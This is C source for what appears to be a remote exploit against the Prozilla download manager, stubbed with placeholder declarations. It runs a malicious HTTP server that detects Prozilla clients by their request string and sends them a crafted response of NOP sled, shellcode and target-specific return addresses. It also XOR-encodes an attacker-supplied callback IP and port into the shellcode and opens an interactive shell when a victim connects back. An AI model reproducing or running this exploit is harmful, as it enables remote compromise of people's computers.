
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct sockaddr_in {int sin_addr; } ;
struct sockaddr {int dummy; } ;
typedef int client_request ;
struct TYPE_2__ {char* dist; int ret; } ;


 int EOF ;
 int MAX_RESPONSE ;
 scalar_t__ TRUE ;
 int accept (int,struct sockaddr*,int*) ;
 int atoi (int ) ;
 int close (int) ;
 int exit (int) ;
 int find_xor (int,int,int) ;
 scalar_t__ fork () ;
 int fprintf (int ,char*,...) ;
 int free (struct sockaddr_in*) ;
 int getopt (int,char**,char*) ;
 char* inet_ntoa (int ) ;
 int init_socket (struct sockaddr_in*,struct sockaddr_in*,int*) ;
 scalar_t__ malloc (int) ;
 int memset (char*,int,int) ;
 int optarg ;
 int perror (char*) ;
 int printf (char*) ;
 scalar_t__ read (int,char*,int) ;
 int real_response ;
 int send (int,int ,int ,int ) ;
 int send_end (int) ;
 int send_nop (int) ;
 int send_start (int,int) ;
 int send_url (int) ;
 int shell (int) ;
 int shellcode ;
 int sscanf (int ,char*,int*,int*,int*,int*) ;
 int stderr ;
 int strlen (int ) ;
 scalar_t__ strstr (char*,char*) ;
 TYPE_1__* targets ;
 int usage (char*) ;

int main(int argc,char **argv)
{

    int i=194;
    int opt_p=0,opt_c=0,opt_t=1;
    int port,porthigh,portlow;
    int c,f;
    int control;
    int connection,from_len;
    int ip1,ip2,ip3,ip4;
    char http_response [2048];
    char client_request[2048];
    struct sockaddr_in *control_addr = (struct sockaddr_in *)malloc(sizeof(struct sockaddr_in));
    struct sockaddr_in *from_addr = (struct sockaddr_in *)malloc(sizeof(struct sockaddr_in));

    while((c=getopt(argc, argv ,"hc:p:t:"))!=EOF) {
            switch (c) {
                case 'h':
                    usage(argv[0]);
                case 'c':
                    opt_c=1;
                    sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3,&ip4);
                    break;
                case 'p':
                    opt_p=1;
                    port = atoi(optarg);
                    if ((port <= 0) || (port > 65535)) {
                        fprintf(stderr, "Invalid port.\n\n");
                        exit(1);
                    }
                    break;
                case 't':
                    opt_t = atoi(optarg);
                    if ((opt_t < 1 || opt_t > 6)) {
                        opt_t = 1;
                        fprintf(stderr,"[+] Default Target [ %s 0x%.08x]\n",targets[opt_t-1].dist,targets[opt_t-1].ret);
                    }
                    else {
                        fprintf(stderr,"[+] Target [ %s 0x%.08x]\n",targets[opt_t-1].dist,targets[opt_t-1].ret);
                    }
                    break;
            }
    }

    if(opt_p) {
        porthigh = (port & 0xff00) >> 8;
        portlow = (port & 0x00ff);
    }
    else {
        port = 8080;
        porthigh = (port & 0xff00) >> 8;
        portlow = (port & 0x00ff);
    }
    if(!opt_c) {
        usage(argv[0]);
    }
    memset(http_response,0x0,MAX_RESPONSE);
    control = init_socket(control_addr,from_addr,&from_len);


    i = find_xor(ip1,i,6);
    i = find_xor(ip2,i,6);
    i = find_xor(ip3,i,6);
    i = find_xor(ip4,i,6);


    i = 207;
    i = find_xor( porthigh,i,5);
    i = find_xor( portlow ,i,5);


    while(TRUE) {
        if((connection=accept(control,(struct sockaddr *)from_addr,&from_len))==-1) {
            exit(1);
        }

        fprintf(stderr,"[+] Victim at : %s\n", inet_ntoa(from_addr->sin_addr));
        if (read(connection,client_request,sizeof(client_request))==0) {
            exit(1);
        }


        if(strstr(client_request,"Prozilla"))
        {
            fprintf(stderr,"[+] Victim using Prozilla.\n");
            f=1;
        }
        else {
            if(strstr(client_request,"SSSS")) {
                fprintf(stderr,"Nice , Victim Responded!\n");
                shell(connection);
            }
            else {
                fprintf(stderr,"[+] Victim is not using Prozilla! Sending a normal response.\n");
                if(send(connection,real_response,strlen(shellcode),0)==-1) {
                    perror("send");
                }
            }
        }

        if(f==1) {

            send_start(connection,opt_t);

            send_nop(connection);
            send_url(connection);

            send_end(connection);
            f=0;
        }

        close(connection);
        memset(client_request,0x0,sizeof(client_request));

        if (fork()==0) {
            free(from_addr);
            free(control_addr);
            exit(0);
        }
        else {
            close(connection);
        }

    }

    printf("Done");
    return 0;
}
